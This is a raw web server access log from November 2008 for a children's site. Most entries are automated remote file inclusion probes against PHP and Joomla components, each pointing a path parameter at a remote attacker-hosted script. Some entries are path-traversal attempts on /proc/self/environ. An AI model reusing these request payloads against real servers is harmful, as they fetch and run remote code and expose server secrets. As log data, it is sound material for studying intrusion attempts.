195.12.62.2 - - [20/Nov/2008:03:26:31 -0700] "GET //include/admin.lib.inc.php?site_path=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
195.12.62.2 - - [20/Nov/2008:03:27:19 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
195.12.62.2 - - [20/Nov/2008:03:27:19 -0700] "GET //include/admin.lib.inc.php?site_path=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
201.94.235.191 - - [20/Nov/2008:03:28:07 -0700] "GET /logs/access_log.old%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:03:28:07 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:03:28:07 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
64.254.233.2 - - [20/Nov/2008:03:28:08 -0700] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
64.254.233.2 - - [20/Nov/2008:03:28:08 -0700] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
98.193.117.182 - - [20/Nov/2008:03:28:38 -0700] "GET /logs/access_log.old/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
89.218.85.18 - - [20/Nov/2008:03:29:19 -0700] "GET /logs/access_log.old/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [20/Nov/2008:03:29:19 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [20/Nov/2008:03:29:19 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
59.125.183.76 - - [20/Nov/2008:03:29:26 -0700] "GET /logs/access_log.old//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
89.218.85.18 - - [20/Nov/2008:03:30:19 -0700] "GET /logs/access_log.old/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [20/Nov/2008:03:30:19 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [20/Nov/2008:03:30:19 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
64.254.233.2 - - [20/Nov/2008:03:30:42 -0700] "GET /logs/access_log.old//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
64.254.233.2 - - [20/Nov/2008:03:30:43 -0700] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
64.254.233.2 - - [20/Nov/2008:03:30:43 -0700] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
203.167.102.84 - - [20/Nov/2008:03:30:44 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
203.167.102.84 - - [20/Nov/2008:03:30:44 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://automotrizozcar.com/images/readme.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
203.167.102.84 - - [20/Nov/2008:03:30:44 -0700] "GET //administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
203.167.102.84 - - [20/Nov/2008:03:30:45 -0700] "GET //administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://automotrizozcar.com/images/readme.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
189.32.144.177 - - [20/Nov/2008:03:31:11 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:03:31:14 -0700] "GET /logs/access_log.old/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
89.218.85.18 - - [20/Nov/2008:03:32:03 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://12.30.53.52/id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [20/Nov/2008:03:32:03 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://12.30.53.52/id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
98.199.39.40 - - [20/Nov/2008:03:35:29 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
87.106.245.44 - - [20/Nov/2008:03:36:23 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [20/Nov/2008:03:36:24 -0700] "GET //include/admin.lib.inc.php?site_path=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
200.126.104.110 - - [20/Nov/2008:03:36:57 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
200.126.104.110 - - [20/Nov/2008:03:36:58 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
200.126.104.110 - - [20/Nov/2008:03:36:58 -0700] "GET /logs/access_log.old%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
70.84.3.50 - - [20/Nov/2008:03:37:08 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "-"
70.84.3.50 - - [20/Nov/2008:03:37:08 -0700] "GET /convert/mvcw.php?vwar_root=http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "-"
203.86.233.109 - - [20/Nov/2008:03:37:13 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "-"
203.86.233.109 - - [20/Nov/2008:03:37:13 -0700] "GET /logs/access_log.old//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "-"
203.86.233.109 - - [20/Nov/2008:03:37:13 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "-"
140.130.101.5 - - [20/Nov/2008:03:37:53 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "-"
140.130.101.5 - - [20/Nov/2008:03:37:53 -0700] "GET /logs/access_log.old//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "-"
140.130.101.5 - - [20/Nov/2008:03:37:53 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "-"
203.86.233.109 - - [20/Nov/2008:03:38:40 -0700] "GET /logs/access_log.old//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "-"
203.86.233.109 - - [20/Nov/2008:03:38:40 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "-"
203.86.233.109 - - [20/Nov/2008:03:38:40 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "-"
203.86.233.109 - - [20/Nov/2008:03:38:55 -0700] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "-"
87.106.245.44 - - [20/Nov/2008:03:39:33 -0700] "GET //skin/zero_vote/error.php?dir=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
140.130.101.5 - - [20/Nov/2008:03:39:52 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
140.130.101.5 - - [20/Nov/2008:03:39:52 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
195.12.62.2 - - [20/Nov/2008:03:41:23 -0700] "GET //skin/zero_vote/error.php?dir=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
195.12.62.2 - - [20/Nov/2008:03:41:25 -0700] "GET //skin/zero_vote/error.php?dir=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
140.130.101.5 - - [20/Nov/2008:03:41:28 -0700] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "-"
201.94.235.191 - - [20/Nov/2008:03:42:17 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:03:42:17 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
140.130.101.5 - - [20/Nov/2008:03:42:54 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
140.130.101.5 - - [20/Nov/2008:03:42:54 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
140.130.101.5 - - [20/Nov/2008:03:42:57 -0700] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
140.130.101.5 - - [20/Nov/2008:03:43:12 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
140.130.101.5 - - [20/Nov/2008:03:43:12 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
140.130.101.5 - - [20/Nov/2008:03:43:12 -0700] "GET /logs/access_log.old//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
72.30.142.229 - - [20/Nov/2008:03:43:15 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.142.229 - - [20/Nov/2008:03:43:17 -0700] "GET /ads/popupads/?M=A HTTP/1.0" 200 2418 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
140.130.101.5 - - [20/Nov/2008:03:43:27 -0700] "GET /logs/access_log.old//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:44:40 -0700] "GET /logs//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:44:40 -0700] "GET //export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:44:41 -0700] "GET /logs/access_log.old//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
140.130.101.5 - - [20/Nov/2008:03:44:46 -0700] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:44:49 -0700] "GET //export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:44:49 -0700] "GET /logs/access_log.old%20%20//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:44:49 -0700] "GET /logs//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:44:51 -0700] "GET /logs/access_log.old//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:44:51 -0700] "GET //export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:44:51 -0700] "GET /logs//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:45:32 -0700] "GET /logs/access_log.old//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:45:47 -0700] "GET /logs/access_log.old%20%20//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:45:52 -0700] "GET /logs/access_log.old%20%20//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:45:53 -0700] "GET /logs/access_log//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:03:45:55 -0700] "GET /logs/access_log//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
200.126.104.110 - - [20/Nov/2008:03:45:56 -0700] "GET /logs/access_log.old/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
222.236.47.182 - - [20/Nov/2008:03:45:57 -0700] "GET /logs/access_log//export_batch.inc.php?DIR=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
72.30.161.224 - - [20/Nov/2008:03:50:24 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.161.224 - - [20/Nov/2008:03:50:24 -0700] "GET /ads/popupads/?M=D HTTP/1.0" 200 2418 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
64.254.233.2 - - [20/Nov/2008:03:54:24 -0700] "GET /logs/error_log.old//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
72.30.161.224 - - [20/Nov/2008:03:54:56 -0700] "GET /oldcalendars/calendarapril06.htm HTTP/1.0" 200 91437 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.52.170.160 - - [20/Nov/2008:04:00:34 -0700] "GET /book.php5?page=http://vnc2009.com/idfeel.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "-"
72.52.170.160 - - [20/Nov/2008:04:00:34 -0700] "GET /logs/access_log.old/book.php5?page=http://vnc2009.com/idfeel.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "-"
72.52.170.160 - - [20/Nov/2008:04:00:35 -0700] "GET /logs/book.php5?page=http://vnc2009.com/idfeel.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "-"
72.52.170.160 - - [20/Nov/2008:04:00:36 -0700] "GET /logs/access_log/book.php5?page=http://vnc2009.com/idfeel.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "-"
195.137.143.11 - - [20/Nov/2008:04:01:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [20/Nov/2008:04:01:03 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.0.147 - - [20/Nov/2008:04:01:35 -0700] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
94.23.0.147 - - [20/Nov/2008:04:01:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
94.23.0.147 - - [20/Nov/2008:04:01:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
94.23.0.147 - - [20/Nov/2008:04:01:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
94.23.0.147 - - [20/Nov/2008:04:01:36 -0700] "GET //skin/zero_vote/error.php?dir=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
94.23.0.147 - - [20/Nov/2008:04:01:36 -0700] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
94.23.0.147 - - [20/Nov/2008:04:01:36 -0700] "GET //skin/zero_vote/error.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
94.23.0.147 - - [20/Nov/2008:04:01:36 -0700] "GET //skin/zero_vote/error.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
72.30.142.181 - - [20/Nov/2008:04:05:56 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.142.181 - - [20/Nov/2008:04:05:57 -0700] "GET /ads/fullpage/?M=A HTTP/1.0" 200 1859 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
61.152.144.67 - - [20/Nov/2008:04:06:11 -0700] "GET /logs/access_log.old//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
61.152.144.67 - - [20/Nov/2008:04:06:11 -0700] "GET /logs/access_log.old//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
61.152.144.67 - - [20/Nov/2008:04:06:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
